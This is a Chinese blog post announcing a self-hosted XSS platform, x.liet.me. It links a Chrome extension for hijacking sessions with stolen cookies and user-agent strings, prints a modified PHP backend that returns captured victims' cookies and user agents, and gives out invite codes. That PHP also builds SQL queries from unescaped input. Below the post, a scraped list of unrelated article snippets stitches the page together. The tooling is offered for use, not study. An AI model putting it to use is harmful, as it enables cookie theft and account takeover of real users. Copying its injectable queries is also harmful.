自改xss小平台x.liet.me上线

  原先一直用xss.hk结果不知怎么被关的,正好手上有代码于是自己搭了一个,网上的类似的xss平台大多一样,原先的xss的chrome插件,不适合 "manifest_version": 2, 
而且很多其他的xss平台直接把代码拿过来,chrome插件的里面的许多代码内容跟xss.me这个与域名绑定的,而且有些加密cookie里面有浏览器的ua信息绑定,所以只用插件替换cookie有时候无法达到效果,否则得借助第三方修改header的插件,我们希望的是完全模拟劫持到的浏览器会话。 
于是有了这一次的修改,php那把在/do/auth的那个接口返回增加了劫持ua的信息,点击口修改当前浏览器cookie跟ua来劫持会话。 
数据放在别人那总归不放心,当然你也可以只用插件,填你自己的接口的信息,你只用插件来劫持会话,我也不会知道你的数据,不过你得稍微修改下php后台的的接口。

平台地址:

x.liet.me

chrome xss mitm attack插件代码地址

https://github.com/lietdai/xss-mitm-attack

修改后的do.php

<?php
/**
 * api.php 接口
 * ----------------------------------------------------------------
 * OldCMS,site:http://www.oldcms.com
 */
if(!defined(‘IN_OLDCMS‘)) die(‘Access Denied‘);

$auth=Val(‘auth‘,‘GET‘);
$db=DBConnect();
$project=$db->FirstRow("SELECT * FROM ".Tb(‘project‘)." WHERE authCode=‘{$auth}‘");
if(empty($project)) exit(‘Auth Err.‘);

switch($act){
    case ‘content‘:
    default:
        $domain=Val(‘domain‘,‘GET‘);
        $where=‘‘;
        if(!empty($domain)) $where.=" AND domain=‘{$domain}‘";
        $res=$db->Dataset("SELECT content,serverContent FROM ".Tb(‘project_content‘)." WHERE projectId=‘{$project[id]}‘ {$where} ORDER BY id DESC");
        $data=array();
        foreach($res as $k=>$v){
            $row=array();
            $content=json_decode($v[‘content‘],true);
            $serverContent = json_decode($v[‘serverContent‘],true);
            $row[‘url‘]=$content[‘opener‘]?$content[‘opener‘]: $content[‘toplocation‘];
            $row[‘cookie‘]=$content[‘cookie‘];
            $serverContent = json_decode($v[‘serverContent‘],true);
            $row[‘ua‘] = $serverContent[‘HTTP_USER_AGENT‘]?:"";
            $data[]=$row;
        }
        echo JsonEncode($data);
        break;
}
?>

发几个邀请码

71ac500c5a331cb7b2806a8e817f1672
34f3f778fa77c0f7fe8efb162ae70db0
df8825cf489fbca96a4663262afd02e1
65d17af1988fdde9f81696105c0ce3eb
4bdf5873cc19e995a925cbf203fdeeba
a66411d043503ea0bfe106a98a093c59
0695d3e66ab68d2b6d88949cbaf575c3
fb92a90b9a8264862699ed04a7d432a4
d358e24bc7ce3e81c73d54dbbb8b1195

禁止x政教=。=

时间: 2024-08-08 03:22:35

自改xss小平台x.liet.me上线的相关文章

新360自媒体:北京时间自媒体平台即将上线!

在3月初,就有网友爆料,360自媒体要和北京电视台联合推出新的自媒体平台--"北京时间".而在3月份期间,北京时间自媒体已经进行系统内部邀请入驻方式,邀请了一部分自媒体人直接进驻,并在4月9日后陆陆续续的发放帐号.据马浩周得知:360自媒体"北京时间"将在4月12日星期二上线. 我们先来了解下北京时间的一些具体情况.北京时间是由360和北京电视台合力打造的一个自媒体平台,由360控股,北京电视台参股.且投资上亿的资金进行的北京市的一项新媒体转型项目.北京时间自媒体传

一个大水的微信入坑经验

最近搞微信整的我好无语,原因是自己太水了.总结了几点经验如下: 部署客户的微信时,最好把自己的测试的账号先取消关注了在部署.这样有助于及早的发现出现的问题. 菜单中的有网页授权时,首先那个appid一定要写成客户的,不要写自己的,切记!(我犯了好几次这样的错误,无语...)微信公众平台的网页授权的验证要配置域名,这个一般没啥问题. 一般在配置文件中,会有配置appid的key,如果没有,就去微信处理的核心类找,一般都会在配置文件中放着.记得改成客户的.(这个错误我也犯了多次,无语...) 如果发

一点感悟:反馈的重要性

人们总是害怕不确定的东西. 比如等公交车,如果公交和地铁一样,每趟车有固定的时间,等公交的时候,烦躁的感觉可能会降低很多. 但是每趟车有固定的时间,很难达到,因为发车时间可能是固定的,但是路况很复杂,说不定会遇到什么样的情况,到达你所在的那一站的时间没有办法保证. 那么退而求其次,能知道下趟车到底什么时候到也是很好的. 这样的话,如果时间不是很充裕,并且知道下趟车可能不会那么快来,就可以果断选择打的等其他交通方式. 减少了"我是打的呢,还是等车呢"的纠结.所以,譬如车来了的app就诞生

npm run build打包后自定义动画没有执行

问题描述:在vue项目中,当你自己写了一些自定义动画效果,然后你npm run build打包项目放到线上环境后,发现动画并没有效果. 解决办法:在vue项目中找到build文件夹下的vue-loader.conf.js,将extract字段的值改为false,再打包上线,就ok了! 原文地址:https://www.cnblogs.com/duanyue/p/9353903.html

九零后女孩币圈变形记

周小雪的大学时代             来源:新浪微博 一 今天我们来认识一个刚刚大学毕业的94年女孩. 周小雪,湖南大学2012级应用物理专业,和大部分的同龄女孩一样,她热爱音乐,从小学开始弹吉他,高中组建乐队,担任主唱.她也热爱旅行,热爱祖国的青山绿水,她在大学期间用一年的时间走遍了中国的每一个省份. 周小雪                    来源:新浪微博 大一暑假时,小雪家门口的小学来了一支国际支教队,她被深深吸引,支教活动是国际经济学商学学生联合会(AIESEC)组织的,小雪经过

SpringBoot系列——利用系统环境变量与配置文件的分支选择实现“智能部署”

前言 通过之前的博客:SpringBoot系列——jar包与war包的部署,我们已经知道了如果实现项目的简单部署,但项目部署的时候最烦的是什么?修改成发布环境对应的配置!数据库连接地址.Eureka注册中心地址.Redis服务地址等,部署环境不一样,打包的时候就要改成对应的配置:常用的环境有本地开发环境dev,本地测试环境dev-test,生产测试环境prod-test,生产环境prod: 开发的时候我们用dev,项目直接运行,不用改配置:发布本地测试环境的时候,打包之前我们要先改成对应配置:上

Python pip换源 创建虚拟环境 luffy项目配置(数据库bug)

目录 pip安装源 基本使用 永久配置安装源 Windows Linux 文件配置内容 虚拟环境安装 Windows Linux 使用 luffy目录重构 日志文件配置 封装项目异常处理 二次封装Response模块 路由组件配置 数据库配置 Django 2.x 一些版本pymysql兼容问题 pip安装源 基本使用 采用国内的源,加速下载模块速度 常用的pip源: -- 豆瓣:https://pypi.douban.com/simple -- 阿里:https://mirrors.aliyu

【转】WAF指纹识别和XSS过滤器绕过技巧

原文链接 http://www.cnblogs.com/r00tgrok/p/Bypass_WAF_and_XSS_Filter_And_Fingerprinting.html [译文] -- “Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters” 0x1 前言 之前在乌云drops上看到一篇绕过WAF跨站脚本过滤器的一些技巧,是从国外的一篇paper部分翻译过来的,可以说文章摘取了原文核心的代码部分

一个典型的XSS盲打漏洞可导致全网用户cookie被盗取

偶平时在做安全测试时,一般是以发现问题为主,点到为止,但做安全的同学可能也遇到过这样的问题,当你尝试向开发的同学描述一个漏洞危害怎么怎么样的时候,双方经常会有一种鸡同鸭讲的感觉,甚至他们觉得我们在夸大其词去影响他们去修复,其实面对开发的同学的质疑,我也觉得合理,毕竟你用XSS去弹个框,能说明什么呢?因此,本案例着偏重渗透的过程,目的是通过一个案例来解决以后鸡同鸭讲的局面,同时也能树立安全部的权威. YS OMM在记录日志时未对输入数据进行过滤,易导致存储型XSS攻击[高] 问题描述: